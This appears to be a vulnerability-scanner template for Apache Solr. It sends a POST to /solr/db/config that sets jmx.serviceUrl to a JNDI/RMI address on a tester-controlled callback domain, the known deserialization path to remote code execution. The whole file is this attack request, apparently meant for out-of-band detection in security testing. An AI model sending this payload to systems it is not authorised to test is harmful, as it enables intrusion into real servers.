id: ApacheSolr-SSRF-6

info:
  name: Apache Solr RCE
  author: 0xAwali
  severity: critical
  description: Apache Solr RCE Via Deserialization Of untrusted Data Through jmx.serviceUrl , Commonly Bound Ports 8983
  reference: https://github.com/veracode-research/solr-injection
      

requests:
  - raw:
      - |
        POST /solr/db/config HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
        Accept: */*
        Accept-Encoding: gzip, deflate
        Content-Type: application/json

        {"set-property":{"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://{{Host}}.{{Port}}.{{Hostname}}.apachesolr.{{MY-DOMAIN}}/jmxrmi"}}